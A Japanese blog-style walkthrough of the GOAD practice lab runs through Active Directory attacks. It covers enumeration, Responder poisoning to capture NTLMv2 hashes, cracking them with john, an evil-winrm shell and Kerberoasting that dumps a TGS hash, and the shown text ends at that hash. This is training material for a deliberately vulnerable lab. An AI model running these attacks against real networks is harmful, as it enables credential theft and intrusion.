About GOAD
GOADとはActive Directory環境でペンテストの練習ができる環境のことである。
https://github.com/Orange-Cyberdefense/GOAD/
GOAD is a pentest active directory LAB project. The purpose of this lab is to give pentesters a vulnerable Active directory environment ready to use to practice usual attack techniques.
と書かれている通り、様々な攻撃手法を試すことができる。
今回は3ドメイン5ホスト環境でペンテストの練習をしてみる。
Installation
https://github.com/Orange-Cyberdefense/GOAD/?tab=readme-ov-file#installation
公式のREADMEが詳しいのでこれ見てやってください。
Writeup
Recon
とりあえず素朴なreconをしてみる。
┌──(kali㉿kali)-[~]
└─$ nxc smb 192.168.56.0/24
SMB 192.168.56.12 445 MEEREEN [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.23 445 BRAAVOS [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
5つのホストに3つのドメインを見つけることができた。
- Domain: essos.local
- meereen.essos.local (Windows Server 2016 Standard Evaluation 14393 x64)
- braavos.essos.local (Windows Server 2016 Standard Evaluation 14393 x64)(signing:False)
- Domain: north.sevenkingdoms.local
- castelblack.north.sevenkingdoms.local (Windows 10 / Server 2019 Build 17763 x64)(signing:False)
- winterfell.north.sevenkingdoms.local (Windows 10 / Server 2019 Build 17763 x64)
- Domain: sevenkingdoms.local
- kingslanding.sevenkingdoms.local (Windows 10 / Server 2019 Build 17763 x64)
Find DC
nslookupでDCを探す
nslookup -type=srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10
┌──(kali㉿kali)-[~]
└─$ nslookup -type=srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10
Server: 192.168.56.10
Address: 192.168.56.10#53
_ldap._tcp.dc._msdcs.sevenkingdoms.local service = 0 100 389 kingslanding.sevenkingdoms.local.
┌──(kali㉿kali)-[~]
└─$ nslookup -type=srv _ldap._tcp.dc._msdcs.north.sevenkingdoms.local 192.168.56.10
Server: 192.168.56.10
Address: 192.168.56.10#53
Non-authoritative answer:
_ldap._tcp.dc._msdcs.north.sevenkingdoms.local service = 0 100 389 winterfell.north.sevenkingdoms.local.
Authoritative answers can be found from:
winterfell.north.sevenkingdoms.local internet address = 192.168.56.11
┌──(kali㉿kali)-[~]
└─$ nslookup -type=srv _ldap._tcp.dc._msdcs.essos.local 192.168.56.10
Server: 192.168.56.10
Address: 192.168.56.10#53
Non-authoritative answer:
_ldap._tcp.dc._msdcs.essos.local service = 0 100 389 meereen.essos.local.
Authoritative answers can be found from:
meereen.essos.local internet address = 192.168.56.12
Setup /etc/hosts
とりあえず見つかったホストをKaliの /etc/hosts
に追加していく
┌──(kali㉿kali)-[~]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
# GOAD
192.168.56.10 sevenkingdoms.local kingslanding.sevenkingdoms.local kingslanding
192.168.56.11 winterfell.north.sevenkingdoms.local north.sevenkingdoms.local winterfell
192.168.56.12 essos.local meereen.essos.local meereen
192.168.56.22 castelblack.north.sevenkingdoms.local castelblack
192.168.56.23 braavos.essos.local braavos
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Enumerate user
NetExecでユーザーを列挙してみる。NetExecはcrackmapexecの後継ツール。とりあえずリンクだけ共有。 https://www.netexec.wiki/
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ nxc smb 192.168.56.11 --users
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL -Username- -Last PW Set- -BadPW- -Description-
SMB 192.168.56.11 445 WINTERFELL Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 192.168.56.11 445 WINTERFELL arya.stark 2024-08-11 03:42:04 0 Arya Stark
SMB 192.168.56.11 445 WINTERFELL sansa.stark 2024-08-11 03:42:13 0 Sansa Stark
SMB 192.168.56.11 445 WINTERFELL brandon.stark 2024-08-11 03:42:14 0 Brandon Stark
SMB 192.168.56.11 445 WINTERFELL rickon.stark 2024-08-11 03:42:16 0 Rickon Stark
SMB 192.168.56.11 445 WINTERFELL hodor 2024-08-11 03:42:18 0 Brainless Giant
SMB 192.168.56.11 445 WINTERFELL jon.snow 2024-08-11 03:42:20 0 Jon Snow
SMB 192.168.56.11 445 WINTERFELL samwell.tarly 2024-08-11 03:42:22 0 Samwell Tarly (Password : Heartsbane)
SMB 192.168.56.11 445 WINTERFELL jeor.mormont 2024-08-11 03:42:23 0 Jeor Mormont
SMB 192.168.56.11 445 WINTERFELL sql_svc 2024-08-11 03:42:25 0 sql service
ついでにパスワードポリシーとかも見てみる
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ nxc smb 192.168.56.11 --pass-pol
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [+] Dumping password info for domain: NORTH
SMB 192.168.56.11 445 WINTERFELL Minimum password length: 5
SMB 192.168.56.11 445 WINTERFELL Password history length: 24
SMB 192.168.56.11 445 WINTERFELL Maximum password age: 311 days 2 minutes
SMB 192.168.56.11 445 WINTERFELL
SMB 192.168.56.11 445 WINTERFELL Password Complexity Flags: 000000
SMB 192.168.56.11 445 WINTERFELL Domain Refuse Password Change: 0
SMB 192.168.56.11 445 WINTERFELL Domain Password Store Cleartext: 0
SMB 192.168.56.11 445 WINTERFELL Domain Password Lockout Admins: 0
SMB 192.168.56.11 445 WINTERFELL Domain Password No Clear Change: 0
SMB 192.168.56.11 445 WINTERFELL Domain Password No Anon Change: 0
SMB 192.168.56.11 445 WINTERFELL Domain Password Complex: 0
SMB 192.168.56.11 445 WINTERFELL
SMB 192.168.56.11 445 WINTERFELL Minimum password age: 1 day 4 minutes
SMB 192.168.56.11 445 WINTERFELL Reset Account Lockout Counter: 5 minutes
SMB 192.168.56.11 445 WINTERFELL Locked Account Duration: 5 minutes
SMB 192.168.56.11 445 WINTERFELL Account Lockout Threshold: 5
SMB 192.168.56.11 445 WINTERFELL Forced Log off Time: Not Set
共有のゲストアクセスを一覧表示する
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ nxc smb 192.168.56.10-23 -u 'a' -p '' --shares
SMB 192.168.56.12 445 MEEREEN [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.23 445 BRAAVOS [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB 192.168.56.12 445 MEEREEN [-] essos.local\a: STATUS_LOGON_FAILURE
SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\a: STATUS_LOGON_FAILURE
SMB 192.168.56.10 445 KINGSLANDING [-] sevenkingdoms.local\a: STATUS_LOGON_FAILURE
SMB 192.168.56.23 445 BRAAVOS [+] essos.local\a:
SMB 192.168.56.22 445 CASTELBLACK [+] north.sevenkingdoms.local\a:
SMB 192.168.56.23 445 BRAAVOS [*] Enumerated shares
SMB 192.168.56.23 445 BRAAVOS Share Permissions Remark
SMB 192.168.56.23 445 BRAAVOS ----- ----------- ------
SMB 192.168.56.23 445 BRAAVOS ADMIN$ Remote Admin
SMB 192.168.56.23 445 BRAAVOS all READ,WRITE Basic RW share for all
SMB 192.168.56.23 445 BRAAVOS C$ Default share
SMB 192.168.56.23 445 BRAAVOS CertEnroll Active Directory Certificate Services share
SMB 192.168.56.23 445 BRAAVOS IPC$ Remote IPC
SMB 192.168.56.23 445 BRAAVOS public Basic Read share for all domain users
SMB 192.168.56.22 445 CASTELBLACK [*] Enumerated shares
SMB 192.168.56.22 445 CASTELBLACK Share Permissions Remark
SMB 192.168.56.22 445 CASTELBLACK ----- ----------- ------
SMB 192.168.56.22 445 CASTELBLACK ADMIN$ Remote Admin
SMB 192.168.56.22 445 CASTELBLACK all READ,WRITE Basic RW share for all
SMB 192.168.56.22 445 CASTELBLACK C$ Default share
SMB 192.168.56.22 445 CASTELBLACK IPC$ READ Remote IPC
SMB 192.168.56.22 445 CASTELBLACK public Basic Read share for all domain users
Running nxc against 14 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
Capture the hash
┌──(kali㉿kali)-[~]
└─$ sudo responder -I eth1
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [eth1]
Responder IP [192.168.56.104]
Responder IPv6 [fe80::5af0:79:dd52:80d1]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
Responder Machine Name [WIN-A7U0IXU07FL]
Responder Domain Name [4EHO.LOCAL]
Responder DCE-RPC Port [48426]
[+] Listening for events...
[+] Exiting...[B^[[B^[[B^[[A^[[A^[[A^[[A^[[A^[[A^[[A^[[A^[[A^[[A^[[A^[[A^C
┌──(kali㉿kali)-[~]
└─$ sudo responder -I eth1
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [eth1]
Responder IP [192.168.56.104]
Responder IPv6 [fe80::5af0:79:dd52:80d1]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
Responder Machine Name [WIN-YPREFKD6ZBU]
Responder Domain Name [NMYV.LOCAL]
Responder DCE-RPC Port [48610]
[+] Listening for events...
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local
[*] [NBT-NS] Poisoned answer sent to 192.168.56.11 for name BRAVOS (service: File Server)
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos
[SMB] NTLMv2-SSP Client : fe80::65bb:b7ff:1ad1:140
[SMB] NTLMv2-SSP Username : NORTH\robb.stark
[SMB] NTLMv2-SSP Hash : robb.stark::NORTH:d186ef4b2d5f70e9:0E29C7FA08D6D94EA56390D123A5A422:010100000000000080112FF50418DB01BB1A6B5A05F8820700000000020008004E004D005900560001001E00570049004E002D00590050005200450046004B00440036005A004200550004003400570049004E002D00590050005200450046004B00440036005A00420055002E004E004D00590056002E004C004F00430041004C00030014004E004D00590056002E004C004F00430041004C00050014004E004D00590056002E004C004F00430041004C000700080080112FF50418DB0106000400020000000800300030000000000000000000000000300000D3F993AF85BF02D37F4080F83793BDF0F3949F40E62C037FA00F37442D3B980D0A001000000000000000000000000000000000000900160063006900660073002F0042007200610076006F0073000000000000000000
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos
[*] Skipping previously captured hash for NORTH\robb.stark
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos
[*] Skipping previously captured hash for NORTH\robb.stark
[*] [NBT-NS] Poisoned answer sent to 192.168.56.11 for name MEREN (service: File Server)
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren
[SMB] NTLMv2-SSP Client : fe80::65bb:b7ff:1ad1:140
[SMB] NTLMv2-SSP Username : NORTH\eddard.stark
[SMB] NTLMv2-SSP Hash : eddard.stark::NORTH:7acc26627de9f50b:8B925C1E0C815B42E9D34D1830847365:010100000000000080112FF50418DB01B120FDB3372E91EC00000000020008004E004D005900560001001E00570049004E002D00590050005200450046004B00440036005A004200550004003400570049004E002D00590050005200450046004B00440036005A00420055002E004E004D00590056002E004C004F00430041004C00030014004E004D00590056002E004C004F00430041004C00050014004E004D00590056002E004C004F00430041004C000700080080112FF50418DB0106000400020000000800300030000000000000000000000000300000D3F993AF85BF02D37F4080F83793BDF0F3949F40E62C037FA00F37442D3B980D0A001000000000000000000000000000000000000900140063006900660073002F004D006500720065006E000000000000000000
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren
[*] Skipping previously captured hash for NORTH\eddard.stark
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren
[*] Skipping previously captured hash for NORTH\eddard.stark
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local
[*] Skipping previously captured hash for NORTH\robb.stark
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos
[*] Skipping previously captured hash for NORTH\robb.stark
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos
[*] Skipping previously captured hash for NORTH\robb.stark
[+] Exiting...
NTLMハッシュを手に入れたのでクラックする
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 9 password hashes with 9 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sexywolfy (robb.stark)
6g 0:00:00:14 DONE (2024-10-06 15:40) 0.4276g/s 1022Kp/s 3622Kc/s 3622KC/s !)(OPPQR..*7¡Vamos!
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
というわけで次の認証情報を手に入れた robb.stark/sexywolfy
NetExecでSMBの認証に使えるか試してみる
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ nxc smb 192.168.56.10-23 -u 'robb.stark' -p 'sexywolfy'
SMB 192.168.56.12 445 MEEREEN [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.12 445 MEEREEN [-] essos.local\robb.stark:sexywolfy STATUS_LOGON_FAILURE
SMB 192.168.56.23 445 BRAAVOS [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [+] north.sevenkingdoms.local\robb.stark:sexywolfy (Pwn3d!)
SMB 192.168.56.10 445 KINGSLANDING [-] sevenkingdoms.local\robb.stark:sexywolfy STATUS_LOGON_FAILURE
SMB 192.168.56.23 445 BRAAVOS [+] essos.local\robb.stark:sexywolfy
SMB 192.168.56.22 445 CASTELBLACK [+] north.sevenkingdoms.local\robb.stark:sexywolfy
Running nxc against 14 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
winterfellで使えるみたい
winrmでも認証情報使えるか試してみる
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ nxc winrm 192.168.56.10-23 -u 'robb.stark' -p 'sexywolfy'
WINRM 192.168.56.11 5985 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 (name:WINTERFELL) (domain:north.sevenkingdoms.local)
WINRM 192.168.56.10 5985 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 (name:KINGSLANDING) (domain:sevenkingdoms.local)
WINRM 192.168.56.12 5985 MEEREEN [*] Windows 10 / Server 2016 Build 14393 (name:MEEREEN) (domain:essos.local)
WINRM 192.168.56.22 5985 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 (name:CASTELBLACK) (domain:north.sevenkingdoms.local)
WINRM 192.168.56.11 5985 WINTERFELL [+] north.sevenkingdoms.local\robb.stark:sexywolfy (Pwn3d!)
WINRM 192.168.56.23 5985 BRAAVOS [*] Windows 10 / Server 2016 Build 14393 (name:BRAAVOS) (domain:essos.local)
WINRM 192.168.56.23 5985 BRAAVOS [-] essos.local\robb.stark:sexywolfy
WINRM 192.168.56.12 5985 MEEREEN [-] essos.local\robb.stark:sexywolfy
WINRM 192.168.56.22 5985 CASTELBLACK [-] north.sevenkingdoms.local\robb.stark:sexywolfy
WINRM 192.168.56.10 5985 KINGSLANDING [-] sevenkingdoms.local\robb.stark:sexywolfy
Running nxc against 14 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
使えそう
なのでevil-winrmでシェルを取りに行く
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ evil-winrm -u robb.stark -p sexywolfy -i winterfell.north.sevenkingdoms.local
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\robb.stark\Documents>
Enumerate User
*Evil-WinRM* PS C:\Users\robb.stark\Documents> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator arya.stark brandon.stark
catelyn.stark eddard.stark Guest
hodor jeor.mormont jon.snow
krbtgt rickon.stark robb.stark
samwell.tarly sansa.stark sql_svc
vagrant
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\robb.stark\Documents>
列挙したユーザーをまとめたusers.txtを作成する
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ cat users.txt
Administrator
arya.stark
brandon.stark
cetelyn.stark
eddard.stark
Guest
hodor
jeor.mormont
jon.snow
krbtgt
rickon.stark
robb.stark
samwell.tarly
sansa.stark
sql_svc
Kerberoasting
Kerberoastingが可能かどうか確認してみる
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ impacket-GetUserSPNs -dc-ip winterfell north.sevenkingdoms.local/"robb.stark":"sexywolfy" -request -k
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Getting machine hostname
[-] CCache file is not found. Skipping...
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------------------------- ----------- ---------------------------------------------------------- -------------------------- -------------------------- -------------
HTTP/eyrie.north.sevenkingdoms.local sansa.stark CN=Stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local 2024-08-10 23:42:13.018886 <never> unconstrained
CIFS/thewall.north.sevenkingdoms.local jon.snow CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local 2024-08-10 23:42:20.300231 <never> constrained
HTTP/thewall.north.sevenkingdoms.local jon.snow CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local 2024-08-10 23:42:20.300231 <never> constrained
MSSQLSvc/castelblack.north.sevenkingdoms.local sql_svc 2024-08-10 23:42:25.706411 2024-10-06 15:29:36.777610
MSSQLSvc/castelblack.north.sevenkingdoms.local:1433 sql_svc 2024-08-10 23:42:25.706411 2024-10-06 15:29:36.777610
[-] CCache file is not found. Skipping...
$krb5tgs$23$*sansa.stark$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/sansa.stark*$bf87ed85f509050cb9c4bc9bc1ebc4b3$d97c2248c3c93175031e5ee7b7ac6dbcfeda023ac301233f84c952814d0ae75907868160dfa3faf02bfc3f75303731242930ddda5fd05bd7dc1b94d7c74f65901e232a42dafc8a0dbd2e09146db9731be56afca3b652fdf63f670164d408c0d68ed4b1cfe72044921607b7d422d219e410c9dc89f8616e42bc5ad2a88f9e8f4ba4d850b6c70acfa4381d54c816acc7430eba665c32743968c3a88255d79813fba891b7fbb5363dc34f36d7804828ed6ddf861b8c05f8352c2b7f8a353a689d4ba81a8fc0870ae811ec434fc680574b7f28392c8d94860b382f952e8f459f0acacad27bbead52c4871fa8b8ae20636e91559ca9e5dc7bea78b0c7f69eb45c18f125417372c04aec71e214c994e729f3233fb5cc12384c8e3f3a6592fc4cdf9ef2c6f278ba0a9dd0141e0f2b8c8a9f7bba18a361ac4fdea1eaee5c5c591c4c1eedd85f59d5aa65556aed9781746c640f608835e8b4dbf12c6ac02b24442d512f6e2adc16f9d4a2885199e013454070019a020b2b784a5fac13640083adb47f79844e1a955dfde141eeea322fd5afebf3f2fe965b0fac8e4d59f3a82b39132ad0cb4abf08023ca376fc03dac5ea64f4b2e9a390fea2f61a450668c0bc28033ee23700775ad9b0d04dd93889aff254158591b8594f776507a1af014c99255a53e0faba14912bfacba8f83e362aadd8e26f6635444a254ca2835e76c2767d4adcd874cf8ffcff4856b3895858beb8ef08731a0e4ea0ef89e361d98fc187e03fe1f001ad111f40f0a51dedb76fd6314a923763149c41ab0ac9dd6a98864a29af3ed41730bbaaca41ee790c2c2e1ed611a1cfcd453ad150baf78df2a644d7e391992c4bda2749cac689bbdc26134842dc98b4a0c5b4bc203b386949434219d539a133b986c2c0cef28740b3c1ad3d78a950d168605ca84b0ac8954c4824e46bc6590cbb8ae512fd785bb9dacd7cc7c33460b123ff42364764c66025924639cab6c0ddc83ef8bd72e31672b13e29ca1d3cfa96d55ba7afaf84101f11e7c3e1e30781adc202e6ba4e16ac39a45441e84b